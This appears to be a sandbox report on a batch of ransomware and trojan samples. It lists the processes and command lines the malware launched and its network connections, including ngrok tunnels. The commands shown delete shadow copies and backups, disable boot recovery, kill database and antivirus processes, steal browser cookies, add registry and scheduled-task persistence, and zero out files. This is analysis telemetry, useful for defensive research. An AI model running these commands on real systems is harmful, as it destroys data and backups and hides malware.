"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe
HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-0b0818a3e82b1653a0160daedf39b18f4dd2a1b41661928451e5a26c4b6392a7.exe"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-1fa9bed9d75dc028cbd7981fa4152a58a5762deb1a9b67a1d7ea9b8f3fbaf2a3.exe
HEUR-Trojan.MSIL.Crypt.gen-1fa9bed9d75dc028cbd7981fa4152a58a5762deb1a9b67a1d7ea9b8f3fbaf2a3.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VWYQ1dFdRvFq.bat" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-29c3861feead5d99c7d2e4c1a50dd6b29f8ca4d8add002ca8028d2f876abbbeb.exe
HEUR-Trojan.MSIL.Crypt.gen-29c3861feead5d99c7d2e4c1a50dd6b29f8ca4d8add002ca8028d2f876abbbeb.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\321b0ed3-0705-495f-b8d7-50a422a526c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-3a21f279c960064cfccdaf1d5baf116ab6a888b235744accba27a1a38b0ec9d6.exe
HEUR-Trojan.MSIL.Crypt.gen-3a21f279c960064cfccdaf1d5baf116ab6a888b235744accba27a1a38b0ec9d6.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS49532F59\arnatic_7.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6404 -ip 6404
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 1916
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-54920b6428a47f26167fa633550d0dffb12ec4981ede7f4e7ec9ad08948432f1.exe
HEUR-Trojan.MSIL.Crypt.gen-54920b6428a47f26167fa633550d0dffb12ec4981ede7f4e7ec9ad08948432f1.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-62a1d962d59b42f23a64fa0c755658c99330bbbdfa03567cc31ec8e6ac165255.exe
HEUR-Trojan.MSIL.Crypt.gen-62a1d962d59b42f23a64fa0c755658c99330bbbdfa03567cc31ec8e6ac165255.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-63745b9e47b0e4b40164cb99c0335f78bdc880ce3fc668ea56902a0cad19b0df.exe
HEUR-Trojan.MSIL.Crypt.gen-63745b9e47b0e4b40164cb99c0335f78bdc880ce3fc668ea56902a0cad19b0df.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-6b15348763895d929ef27e7e014834bb95bc7c5bdf1607dd7c8b0eac3ff45fd4.exe
HEUR-Trojan.MSIL.Crypt.gen-6b15348763895d929ef27e7e014834bb95bc7c5bdf1607dd7c8b0eac3ff45fd4.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-6d3e25cfe701bac6f08302a46c7db8029a771c30ff83fe758d04dbaea7c6b971.exe
HEUR-Trojan.MSIL.Crypt.gen-6d3e25cfe701bac6f08302a46c7db8029a771c30ff83fe758d04dbaea7c6b971.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-71609c370ed4d3d62069401d753b937faf2dc66c0003409999946f5eb1046816.exe
HEUR-Trojan.MSIL.Crypt.gen-71609c370ed4d3d62069401d753b937faf2dc66c0003409999946f5eb1046816.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-778a433f0c438f5f4ad261e0c14d350e37f10d8fe4ca7794da84052aa114f94c.exe
HEUR-Trojan.MSIL.Crypt.gen-778a433f0c438f5f4ad261e0c14d350e37f10d8fe4ca7794da84052aa114f94c.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-861c62fc1b264801e17d6a61ac6579a3b7d6d39e2f35aec69fc1b8300f42c953.exe
HEUR-Trojan.MSIL.Crypt.gen-861c62fc1b264801e17d6a61ac6579a3b7d6d39e2f35aec69fc1b8300f42c953.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-95bfcb9ec97978061e11529df66763e557b1594430867ee63cde0f115bbef933.exe
HEUR-Trojan.MSIL.Crypt.gen-95bfcb9ec97978061e11529df66763e557b1594430867ee63cde0f115bbef933.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-9ade8e3be001803151f0013e9e36c53ce9b8f7aed9841a8950084e396979b164.exe
HEUR-Trojan.MSIL.Crypt.gen-9ade8e3be001803151f0013e9e36c53ce9b8f7aed9841a8950084e396979b164.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-9ae361667dede244ad234a15e0cd652b17a4213c1d80d249aeb7f8dcc1fd71f7.exe
HEUR-Trojan.MSIL.Crypt.gen-9ae361667dede244ad234a15e0cd652b17a4213c1d80d249aeb7f8dcc1fd71f7.exe
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a1e497a85d0c490c223de6debe48544c4670c83e92d409d541da9e4372f3b673.exe
HEUR-Trojan.MSIL.Crypt.gen-a1e497a85d0c490c223de6debe48544c4670c83e92d409d541da9e4372f3b673.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Windows\SysWOW64\nslookup.exe
C:\Windows\SysWOW64\nslookup.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a4e5b35dfb545696862a74a499546719823828844203cbfc50965b6fd54ed9c4.exe
HEUR-Trojan.MSIL.Crypt.gen-a4e5b35dfb545696862a74a499546719823828844203cbfc50965b6fd54ed9c4.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Users\Admin\AppData\Local\Temp\wind.exe
"C:\Users\Admin\AppData\Local\Temp\wind.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a5d7dc1f0a8570c6e84fa51e259025a5b09594ba8c11a632ac95df7eed359d5d.exe
HEUR-Trojan.MSIL.Crypt.gen-a5d7dc1f0a8570c6e84fa51e259025a5b09594ba8c11a632ac95df7eed359d5d.exe
C:\Users\Admin\RuntimeBroker.exe
"C:\Users\Admin\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-a8117089f8fed4a9f732895d6068beeb87627bdf08d56196a75929bec02326e6.exe
HEUR-Trojan.MSIL.Crypt.gen-a8117089f8fed4a9f732895d6068beeb87627bdf08d56196a75929bec02326e6.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ac4c879915e9429ce43900b2efd56becc50c842b6d70f2328a3ad40f749c675f.exe
HEUR-Trojan.MSIL.Crypt.gen-ac4c879915e9429ce43900b2efd56becc50c842b6d70f2328a3ad40f749c675f.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe
HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-c130ea959e49d716170b04de5e49c97d4bee1e54905a33f22fda80afcef1dd73.exe
HEUR-Trojan.MSIL.Crypt.gen-c130ea959e49d716170b04de5e49c97d4bee1e54905a33f22fda80afcef1dd73.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\wind.exe" "wind.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Windows\Steam.exe
"C:\Windows\Steam.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Windows\Steam.exe"
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-c5501222fa725c82f0e978d2bfdc1b8435dd7784b21e532531ec2e107077aa5c.exe
HEUR-Trojan.MSIL.Crypt.gen-c5501222fa725c82f0e978d2bfdc1b8435dd7784b21e532531ec2e107077aa5c.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "hdgse" /t REG_SZ /d "C:\Users\Admin\Music\opeir.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.Win32.Stop.gen-cc2d59e5fe1823c860fa7b4996f8b5be24bbc4da15b757ea477ef3864031fac1.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 conhost.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d4cd3c969a24c05c57e7381db22c9ce662a785cfe815372385746967fb75deb7.exe
HEUR-Trojan.MSIL.Crypt.gen-d4cd3c969a24c05c57e7381db22c9ce662a785cfe815372385746967fb75deb7.exe
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "hdgse" /t REG_SZ /d "C:\Users\Admin\Music\opeir.exe"
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe
HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 net1.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "windowsdefendertask" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-e819055cd0c4b64408c03b4e6fabc0185c05bc4f6056ce0b98f9fa257371b984.exe
HEUR-Trojan.MSIL.Crypt.gen-e819055cd0c4b64408c03b4e6fabc0185c05bc4f6056ce0b98f9fa257371b984.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 ARP.EXE
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 icacls.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-e95e2e16abd42f380c142cdbc9b545cdb32076ffebc3021ba5e7503d6e292d35.exe
HEUR-Trojan.MSIL.Crypt.gen-e95e2e16abd42f380c142cdbc9b545cdb32076ffebc3021ba5e7503d6e292d35.exe
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 cmd.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1032 -ip 1032
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ec6af3530e12f450657a1a54e44580dfd29e32a46d888c694967573b0796f3f2.exe
HEUR-Trojan.MSIL.Crypt.gen-ec6af3530e12f450657a1a54e44580dfd29e32a46d888c694967573b0796f3f2.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8nKAsTBg82Gl.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 856
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-f716105c9ddf6f05dd9b202e6a0a2064e0ca9a1021407fb1feee6f83512cac9e.exe
HEUR-Trojan.MSIL.Crypt.gen-f716105c9ddf6f05dd9b202e6a0a2064e0ca9a1021407fb1feee6f83512cac9e.exe
C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe
"C:\Users\Admin\AppData\Local\Temp\zqihe2o4.exe" 3580 HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe *32
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-ad45ac253fc9225f631605569d57ca7b0c27d53468a9a732963d0f3cf97e14e8.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\00460\HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131.exe
C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe
"C:\Users\Admin\Desktop\00460\HEUR-Trojan.MSIL.Crypt.gen-d6b9ef1899c1b113371f34db9d306763e20d9dc759fb9975982a53e6a11b1f5b.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 8c881c2cfea9.ngrok.io | udp |
| DE | 3.124.142.205:80 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 3.124.142.205:80 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | telete.in | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 205.142.124.3.in-addr.arpa | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 227.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.tcp.ngrok.io | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 45.153.241.244:5506 | | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 241.184.16.104.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 45.153.241.244:5506 | | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
